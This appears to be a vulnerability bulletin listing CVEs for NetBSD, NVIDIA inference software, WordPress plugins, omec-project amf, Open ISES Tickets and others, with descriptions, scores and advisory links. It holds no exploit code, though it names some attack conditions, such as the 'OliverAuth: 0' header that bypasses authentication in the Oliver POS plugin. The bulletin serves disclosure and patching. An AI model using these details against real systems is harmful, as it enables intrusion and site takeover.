NetBSD–src NetBSD prior to commit ec8451e contains a signed integer overflow vulnerability in the cryptodev_op() function in sys/opencrypto/cryptodev.c where the local variable iov_len is declared as a signed int but assigned from an unsigned cop->dst_len value, causing undefined behavior when cop->dst_len exceeds INT_MAX. A local attacker with access to /dev/crypto and a compression session type can exploit this vulnerability by providing a dst_len value exceeding INT_MAX to trigger a kernel panic through NULL pointer dereference when CONFIG_SVS is disabled and corrupted UIO pointer arithmetic. 2026-05-18 5.5 CVE-2026-32849 https://nasm.re/posts/uaf_netbsd_crypto/
https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f
https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c
 
NetBSD–src NetBSD prior to commit ec8451e contains a race condition vulnerability in cryptodev_op() within the opencrypto subsystem that allows local attackers to trigger a double-free condition by concurrently issuing CIOCCRYPT operations on the same session identifier on SMP systems. Attackers can exploit mutable per-operation state embedded in the csession struct to corrupt kernel heap memory. 2026-05-18 4.7 CVE-2026-32848 https://nasm.re/posts/uaf_netbsd_crypto/
https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f
https://www.vulncheck.com/advisories/netbsd-cryptodev-race-condition-double-free-via-cryptodev-op
 
nimiq–core-rs-albatross nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and prior, network-libp2p discovery accepts signed PeerContact updates from untrusted peers and stores them in a peer contact book, eventually leading to an address book crash. A PeerContact can legally contain an empty addresses list (no intrinsic validation enforces non-empty). Later, PeerContactBook::known_peers builds an address book by taking addresses.first().expect("every peer should have at least one address"). If the attacker has inserted a signed peer contact with addresses=[], any call to get_address_book (RPC/web client) can panic and crash the node/RPC task depending on panic settings. This issue has been fixed in version 1.4.0. 2026-05-20 4.3 CVE-2026-40094 https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-c45m-6x25-3cjq
https://github.com/nimiq/core-rs-albatross/pull/3715
https://github.com/nimiq/core-rs-albatross/releases/tag/v1.4.0
 
NousResearch–hermes-agent A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.16. This vulnerability affects the function _is_blocked_device of the file tools/file_tools.py of the component read_file Tool. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.5 CVE-2026-9351 VDB-365314 | NousResearch hermes-agent read_file Tool file_tools.py _is_blocked_device path traversal
VDB-365314 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #812214 | NousResearch hermes-agent 2026.4.16 Path Traversal (CWE-22)
https://gist.github.com/YLChen-007/1d1aeff404cb88e06ec2fb3377f49fef
 
NousResearch–hermes-agent A vulnerability was detected in NousResearch hermes-agent up to 2026.4.16. The affected element is an unknown function of the component Slack Agent/Mattermost Agent. The manipulation of the argument format_message results in escaping of output. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.5 CVE-2026-9354 VDB-365317 | NousResearch hermes-agent Slack Agent/Mattermost Agent escape output
VDB-365317 | CTI Indicators (IOB, IOC, IOA)
Submit #812226 | NousResearch hermes-agent 2026.4.16 Improper Encoding or Escaping of Output (CWE-116)
https://gist.github.com/YLChen-007/e90fb38ac03284176bae49898a3a46a4
 
NousResearch–hermes-agent A weakness has been identified in NousResearch hermes-agent up to 2026.4.23. This issue affects the function _make_run_env of the file tools/environments/local.py of the component Messaging Gateway Handler. Executing a manipulation can lead to information disclosure. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 5.3 CVE-2026-9352 VDB-365315 | NousResearch hermes-agent Messaging Gateway local.py _make_run_env information disclosure
VDB-365315 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #812215 | NousResearch hermes-agent 2026.4.23 Exposure of Sensitive Information (CWE-200)
https://gist.github.com/YLChen-007/760b3940f708990e535214529c0c7a27
 
NousResearch–hermes-agent A security flaw has been discovered in NousResearch hermes-agent 2026.4.23. Affected is the function _discover_dashboard_plugins of the file hermes_cli/web_server.py of the component CLI web-dashboard Interface. Performing a manipulation of the argument HERMES_ENABLE_PROJECT_PLUGINS results in incorrect comparison. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 5.3 CVE-2026-9369 VDB-365332 | NousResearch hermes-agent CLI web-dashboard web_server.py _discover_dashboard_plugins comparison
VDB-365332 | CTI Indicators (IOB, IOC, IOA)
Submit #812230 | NousResearch hermes-agent 2026.4.23 Incorrect Comparison (CWE-697)
https://gist.github.com/YLChen-007/062b77ceac6aa9844842a616f5d2ef30
 
Nozomi Networks–Guardian A Stored HTML Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can push malicious remote strategies containing HTML tags through the sync. When a victim views the affected remote strategy in the Smart Polling functionality, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. 2026-05-19 6.5 CVE-2025-40904 https://security.nozominetworks.com/NN-2026:7-01
 
Nozomi Networks–Guardian A Stored HTML Injection vulnerability was discovered in the Credentials Manager functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious identity containing HTML tags. When a victim attempts to delete the affected identity, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. 2026-05-19 5.9 CVE-2025-40901 https://security.nozominetworks.com/NN-2026:4-01
 
Nozomi Networks–Guardian A Stored HTML Injection vulnerability was discovered in the Users functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can create a malicious user whose username contains HTML tags. When a victim attempts to delete a group containing the affected user, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. 2026-05-19 5.9 CVE-2025-40902 https://security.nozominetworks.com/NN-2026:5-01
 
Nozomi Networks–Guardian A Stored HTML Injection vulnerability was discovered in the Schedule Restore Archive functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious restore schedule containing HTML tags. When a victim views the affected schedule, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. 2026-05-19 5.9 CVE-2025-40903 https://security.nozominetworks.com/NN-2026:6-01
 
Nozomi Networks–Guardian An Angular template injection vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing an Angular template payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the Angular template executes in their browser context, allowing the attacker to modify application data, or disrupt application availability. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. 2026-05-19 4.6 CVE-2025-40900 https://security.nozominetworks.com/NN-2026:3-01
 
npitre–cramfs-tools A vulnerability was detected in npitre cramfs-tools up to 2.2. Affected is the function change_file_status of the file cramfsck.c. Performing a manipulation results in symlink following. The attack requires a local approach. The exploit is now public and may be used. The patch is named b4a3a695c9873f824907bd15659f2a6ac7667b4f. It is recommended to apply a patch to fix this issue. 2026-05-18 4.2 CVE-2026-8784 VDB-364408 | npitre cramfs-tools cramfsck.c change_file_status symlink
VDB-364408 | CTI Indicators (IOB, IOC, IOA)
Submit #811897 | GNU cramfs-tools below v2.2 Symlink Following
https://github.com/npitre/cramfs-tools/issues/13
https://github.com/npitre/cramfs-tools/issues/13#issuecomment-4306102583
https://github.com/npitre/cramfs-tools/commit/b4a3a695c9873f824907bd15659f2a6ac7667b4f
https://github.com/npitre/cramfs-tools/
 
NVIDIA–TensorRT-LLM NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and an unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. 2026-05-20 6.3 CVE-2026-24142 https://nvd.nist.gov/vuln/detail/CVE-2026-24142
https://www.cve.org/CVERecord?id=CVE-2026-24142
https://nvidia.custhelp.com/app/answers/detail/a_id/5805
 
NVIDIA–TensorRT-LLM NVIDIA TRT-LLM for any platform contains a vulnerability where an attacker could cause an unchecked return value to lead to a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service. 2026-05-20 5.5 CVE-2026-24160 https://nvd.nist.gov/vuln/detail/CVE-2026-24160
https://www.cve.org/CVERecord?id=CVE-2026-24160
https://nvidia.custhelp.com/app/answers/detail/a_id/5805
 
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. 2026-05-20 5.3 CVE-2026-24208 https://nvd.nist.gov/vuln/detail/CVE-2026-24208
https://www.cve.org/CVERecord?id=CVE-2026-24208
https://nvidia.custhelp.com/app/answers/detail/a_id/5828
 
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability in the DALI backend, where an attacker could cause uncontrolled resource consumption. A successful exploit of this vulnerability might lead to denial of service. 2026-05-20 5.7 CVE-2026-24215 https://nvd.nist.gov/vuln/detail/CVE-2026-24215
https://www.cve.org/CVERecord?id=CVE-2026-24215
https://nvidia.custhelp.com/app/answers/detail/a_id/5828
 
oliverpos–Oliver POS A WooCommerce Point of Sale (POS) The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 2.4.2.6. The plugin protects its entire /wp-json/pos-bridge/* REST API namespace through the oliver_pos_rest_authentication() permission callback, which uses a loose PHP comparison (==) to compare the attacker-supplied 'OliverAuth' header value against the 'oliver_pos_authorization_token' option. On fresh installations where the admin has not yet completed the connection flow, this option is unset (get_option returns false). Due to PHP's type juggling, the loose comparison '0' == false evaluates to true, allowing an unauthenticated attacker to bypass authentication by sending 'OliverAuth: 0'. This grants full access to all POS API endpoints, enabling attackers to read user data (including administrator details), update user profiles (including email addresses), and delete non-admin users. An admin account email reset can lead to site takeover. 2026-05-20 6.5 CVE-2026-6072 https://www.wordfence.com/threat-intel/vulnerabilities/id/ca6aa922-9c58-445c-b88a-3d1d1c95102c?source=cve
https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1679
https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1679
https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1677
https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1677
https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L170
https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L170
https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L195
https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L195
https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L231
https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L231
 
olivesystem– The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘js’ parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to ‘admin_init’ and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress’s magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode. 2026-05-20 6.4 CVE-2026-5293 https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102
 
omec-project–amf A vulnerability was detected in omec-project amf up to 2.1.1. Affected by this vulnerability is an unknown functionality of the component PathSwitchRequest Handler. The manipulation results in memory corruption. The attack may be launched remotely. The exploit is now public and may be used. It is advisable to implement a patch to correct this issue. 2026-05-23 6.3 CVE-2026-9298 VDB-365245 | omec-project amf PathSwitchRequest memory corruption
VDB-365245 | CTI Indicators (IOB, IOC)
Submit #811684 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/680
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/
 
omec-project–amf A flaw has been found in omec-project amf up to 2.1.1. Affected by this issue is the function PDUSessionResourceModifyIndication of the file /go/src/amf/ngap/handler.go. This manipulation causes memory corruption. Remote exploitation of the attack is possible. The exploit has been published and may be used. Applying a patch is the recommended action to fix this issue. 2026-05-23 6.3 CVE-2026-9299 VDB-365246 | omec-project amf handler.go PDUSessionResourceModifyIndication memory corruption
VDB-365246 | CTI Indicators (IOB, IOC, IOA)
Submit #811829 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/681
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/
 
omec-project–amf A vulnerability has been found in omec-project amf up to 2.1.1. This affects an unknown part of the component NGSetupRequest Handler. Such manipulation leads to memory corruption. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. It is best practice to apply a patch to resolve this issue. 2026-05-23 6.3 CVE-2026-9300 VDB-365247 | omec-project amf NGSetupRequest memory corruption
VDB-365247 | CTI Indicators (IOB, IOC)
Submit #811841 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/679
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/
 
omec-project–amf A vulnerability was found in omec-project amf up to 2.1.1. This vulnerability affects unknown code of the component NGReset Message Handler. Performing a manipulation results in memory corruption. The attack is possible to be carried out remotely. The exploit has been made public and could be used. It is recommended to apply a patch to fix this issue. 2026-05-23 6.3 CVE-2026-9301 VDB-365248 | omec-project amf NGReset Message memory corruption
VDB-365248 | CTI Indicators (IOB, IOC)
Submit #811842 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/678
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/
 
omec-project–amf A vulnerability was determined in omec-project amf up to 2.1.3-dev. Impacted is the function NGSetupRequest of the file ngap/handler.go. Executing a manipulation of the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.0 is recommended to address this issue. The affected component should be upgraded. The same pull request fixes multiple security issues. 2026-05-18 4.3 CVE-2026-8779 VDB-364403 | omec-project amf handler.go NGSetupRequest memory corruption
VDB-364403 | CTI Indicators (IOB, IOC, IOA)
Submit #811616 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/671
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/releases/tag/v2.2.0
https://github.com/omec-project/amf/
 
omec-project–amf A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues. 2026-05-18 4.3 CVE-2026-8780 VDB-364404 | omec-project amf NGAP Message dispatcher.go memory corruption
VDB-364404 | CTI Indicators (IOB, IOC, IOA)
Submit #811617 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/670
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/releases/tag/v2.2.0
https://github.com/omec-project/amf/
 
omec-project–amf A security flaw has been discovered in omec-project amf up to 2.1.3-dev. The impacted element is the function RANConfiguration of the file ngap/handler.go. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.2.0 is sufficient to resolve this issue. Upgrading the affected component is recommended. The same pull request fixes multiple security issues. 2026-05-18 4.3 CVE-2026-8781 VDB-364405 | omec-project amf handler.go RANConfiguration null pointer dereference
VDB-364405 | CTI Indicators (IOB, IOC, IOA)
Submit #811653 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/673
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/releases/tag/v2.2.0
https://github.com/omec-project/amf/
 
omec-project–amf A weakness has been identified in omec-project amf up to 2.1.3-dev. This affects an unknown function of the file ngap/handler.go of the component NGAP Message Handler. This manipulation causes null pointer dereference. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.2.0 mitigates this issue. It is recommended to upgrade the affected component. The same pull request fixes multiple security issues. 2026-05-18 4.3 CVE-2026-8782 VDB-364406 | omec-project amf NGAP Message handler.go null pointer dereference
VDB-364406 | CTI Indicators (IOB, IOC, IOA)
Submit #811654 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/674
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/releases/tag/v2.2.0
https://github.com/omec-project/amf/
 
omec-project–amf A security vulnerability has been detected in omec-project amf up to 2.1.3-dev. This impacts the function UERadioCapabilityCheckResponse of the file ngap/dispatcher.go. Such manipulation leads to null pointer dereference. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.2.0 will fix this issue. Upgrading the affected component is advised. The same pull request fixes multiple security issues. 2026-05-18 4.3 CVE-2026-8783 VDB-364407 | omec-project amf dispatcher.go UERadioCapabilityCheckResponse null pointer dereference
VDB-364407 | CTI Indicators (IOB, IOC, IOA)
Submit #811655 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption
https://github.com/omec-project/amf/issues/675
https://github.com/omec-project/amf/pull/666
https://github.com/omec-project/amf/releases/tag/v2.2.0
https://github.com/omec-project/amf/
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48213 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-php-ticket-id-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute and an inline JavaScript string literal. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48214 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-nm-php-ticket-id-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in circle.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48215 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-circle-php-frm-id-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in db_loader.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through multiple POST parameters (ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix, db_schema) directly into HTML form input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48216 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-db-loader-php-multiple-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in delete_module.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through multiple POST parameters (module_choice, flag, confirmation) directly into rendered HTML content and form action attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48217 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-delete-module-php-multiple-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in icons/buttons/landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_name and frm_id POST parameters directly into rendered HTML content and inline JavaScript. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48218 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-icons-buttons-landb-php-frm-name-and-frm-id-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics202.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48219 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics202-php-frm-add-str-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48220 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205-php-frm-add-str-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205a.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48221 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205a-php-frm-add-str-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48222 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213-php-frm-add-str-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213rr.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48223 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213rr-php-frm-add-str-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics214.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48224 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics214-php-frm-add-str-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the _type POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48225 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-landb-php-type-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in os_watch.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ref and mode_orig POST parameters directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48226 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-os-watch-php-ref-and-mode-orig-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48227 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-php-id-and-ticket-id-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_w.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48228 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-w-php-id-and-ticket-id-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_i.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48229 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-i-php-ticket-id-parameter
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ticketsmdb_import.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through multiple POST parameters (mdbhost, mdbdb, mdbuser, mdbpassword, mdbprefix, ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix) directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. 2026-05-21 5.4 CVE-2026-48230 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
